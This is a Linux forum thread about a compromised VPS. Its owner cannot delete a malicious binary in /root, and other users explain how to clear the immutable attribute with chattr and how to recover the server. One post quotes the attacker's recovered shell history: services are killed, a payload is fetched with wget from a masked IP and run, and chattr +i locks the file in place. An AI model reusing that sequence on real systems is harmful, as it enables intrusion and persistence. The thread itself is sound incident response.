Author Topic: Cant delete or chown file as a root  (Read 8064 times)

0 Members and 1 Guest are viewing this topic.

Offline postcd

  • Jr. Member
  • **
  • Posts: 37
  • Karma: 0
  • Gender: Male
  • just curious
    • View Profile
    • Awards
Cant delete or chown file as a root
« on: July 30, 2014, 03:28:30 pm »
Hello,

some hack script suddenly appear in the /root directory of my VPS. Lets call it "badscript"

Quote
-rwxr-xr-x 1 root root 1.2M Jul 18 12:34 badscript

but i cant delete it or chown it being root..

it says:
Quote
rm: cannot remove `badscript': Operation not permitted
chown: changing ownership of `badscript': Operation not permitted

stat badscript
Quote
File: `badscript'
  Size: 1189151    Blocks: 2336       IO Block: 4096   regular file
Device: 57h/87d Inode: 17932822    Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2014-07-29 16:51:30.000000000 -0400
Modify: 2014-07-18 12:34:49.000000000 -0400
Change: 2014-07-29 16:51:25.000000000 -0400

Please any idea how to block that person who added this script to my linux redhat server?

"last" command shows only my regular ips, no stranger ip

and how to remove that script? Thank you
« Last Edit: July 30, 2014, 03:37:40 pm by postcd »
no general writing in my threads please, only helpfull ontopic please

Offline chemicalfan

  • Hero Member
  • *****
  • Posts: 1166
  • Karma: 36
  • Gender: Male
  • I've been here a little while!
    • View Profile
    • Awards
Re: Cant delete or chown file as a root
« Reply #1 on: July 30, 2014, 04:29:27 pm »
I'd change the root password, stat.
The hacker must have it in order to write to that folder

Offline chemicalfan

  • Hero Member
  • *****
  • Posts: 1166
  • Karma: 36
  • Gender: Male
  • I've been here a little while!
    • View Profile
    • Awards
Re: Cant delete or chown file as a root
« Reply #2 on: July 30, 2014, 04:33:31 pm »
I'd also reboot into single-user mode, in case there is some kind of zero-day privilege escalation bug.
Is the server fully updated?

Offline postcd

  • Jr. Member
  • **
  • Posts: 37
  • Karma: 0
  • Gender: Male
  • just curious
    • View Profile
    • Awards
Re: Cant delete or chown file as a root
« Reply #3 on: July 30, 2014, 04:40:46 pm »
i changed root password and the server has no extra users, only those created during apache, mysql install
i have feeling that the server is compromised somehow from inside, not from outside someone logging it via ssh, the roor password was safe one.

the script was running like:
./badscript
/root/badscript
no general writing in my threads please, only helpfull ontopic please

Offline Mark Greaves (PCNetSpec)

  • Administrator
  • Hero Member
  • *****
  • Posts: 18237
  • Karma: 476
  • Gender: Male
  • "-rw-rw-rw-" .. The Number Of The Beast
    • View Profile
    • PCNetSpec
    • Awards
Re: Cant delete or chown file as a root
« Reply #4 on: July 30, 2014, 05:50:00 pm »
OK, run:
Code: [Select]
cd /
then check the output from:
Code: [Select]
lsattr
if you see an "a" in the badscript extended attributes, like this:-

-----a-------e-- ./badscript

it's flagged as "append only" .. so run:
Code: [Select]
chattr -a badscript
to remove the append only extended attribute flag

Now try deleting it.

[EDIT]

An "i" flag (in the lsattr output) denotes the file is flagged as "immutable" .. so remove that with:
Code: [Select]
chattr -i badscript
or both at the same time with:
Code: [Select]
chattr -i -a badscript

Info on extended attributes can be found here:
http://www.linuxintheshell.org/2013/04/23/episode-028-extended-attributes-lsattr-and-chattr/
« Last Edit: July 30, 2014, 06:31:31 pm by Mark Greaves (PCNetSpec) »
WARNING: You are logged into reality as 'root'
logging in as 'insane' is the only safe option.
pcnetspec.co.uk

Offline postcd

  • Jr. Member
  • **
  • Posts: 37
  • Karma: 0
  • Gender: Male
  • just curious
    • View Profile
    • Awards
Re: Cant delete or chown file as a root
« Reply #5 on: July 30, 2014, 08:12:38 pm »
thx, when i run lsattrm it shows:
Quote
----i---------- ./badscript


cat /etc/passwd | grep root
Quote
root:x:0:0:root:/root:/bin/bash
operator:x:11:0:operator:/root:/sbin/nologin


Also thanks to command:
find /root -type f -name "*" -mtime -48

i found some modiffied files, amongs them:
Quote
/root/sent
/root/badscript
/root/conf.n
/root/.mysql_history
/root/.bash_history


cat /root/.bash_history
Quote
uname -a
passwd
ps -
killall -9 httpd
killall -9 pickup
killall -9 qmgr
killall -9 proftpd
killall -9 xinetd
wget http://http://192.161.*.*:1688/badscript
chmod +x badscript
./badscript
chattr +i badscript
killall -9 sshpa

(i replaced ip by asterisks)

cat /root/.mysql_history
Quote
password
show databases;


please any ideas? I already changed root password, and its not guessable one..
« Last Edit: July 30, 2014, 08:29:51 pm by postcd »
no general writing in my threads please, only helpfull ontopic please

Offline Mark Greaves (PCNetSpec)

  • Administrator
  • Hero Member
  • *****
  • Posts: 18237
  • Karma: 476
  • Gender: Male
  • "-rw-rw-rw-" .. The Number Of The Beast
    • View Profile
    • PCNetSpec
    • Awards
Re: Cant delete or chown file as a root
« Reply #6 on: July 30, 2014, 08:44:33 pm »
See my edit above.
Code: [Select]
chattr -i badscript
(run as root)

then you should be able to delete it
« Last Edit: July 30, 2014, 08:48:27 pm by Mark Greaves (PCNetSpec) »
WARNING: You are logged into reality as 'root'
logging in as 'insane' is the only safe option.
pcnetspec.co.uk

Offline postcd

  • Jr. Member
  • **
  • Posts: 37
  • Karma: 0
  • Gender: Male
  • just curious
    • View Profile
    • Awards
Re: Cant delete or chown file as a root
« Reply #7 on: July 30, 2014, 08:51:07 pm »
yes, thx, i already eliminated that script thanks to your command.
Please any other advices regarding things i posted before?
no general writing in my threads please, only helpfull ontopic please

Offline Mark Greaves (PCNetSpec)

  • Administrator
  • Hero Member
  • *****
  • Posts: 18237
  • Karma: 476
  • Gender: Male
  • "-rw-rw-rw-" .. The Number Of The Beast
    • View Profile
    • PCNetSpec
    • Awards
Re: Cant delete or chown file as a root
« Reply #8 on: July 30, 2014, 09:03:45 pm »
Any ideas about what ?

Here's an idea .. recover from a known clean backup, then firewall off any SSH ports unless accessed over an openvpn connection authenticated by certificate ;)
« Last Edit: July 30, 2014, 09:16:22 pm by Mark Greaves (PCNetSpec) »
WARNING: You are logged into reality as 'root'
logging in as 'insane' is the only safe option.
pcnetspec.co.uk

Offline Mad Penguin

  • Administrator
  • Hero Member
  • *****
  • Posts: 1420
  • Karma: 10018
  • Gender: Male
    • View Profile
    • Linux in the UK
    • Awards
Re: Cant delete or chown file as a root
« Reply #9 on: July 30, 2014, 11:52:47 pm »
If you could post a copy of "badscript" we could comment more???

Offline postcd

  • Jr. Member
  • **
  • Posts: 37
  • Karma: 0
  • Gender: Male
  • just curious
    • View Profile
    • Awards
Re: Cant delete or chown file as a root
« Reply #10 on: July 31, 2014, 09:01:17 am »
If you could post a copy of "badscript" we could comment more???

Here is the link to VirusTotal.com analysis of the file: http://pastebin.com/mtMshTwR
Its unreadable file, code looks like some .exe or something
no general writing in my threads please, only helpfull ontopic please

 


SimplePortal 2.3.3 © 2008-2010, SimplePortal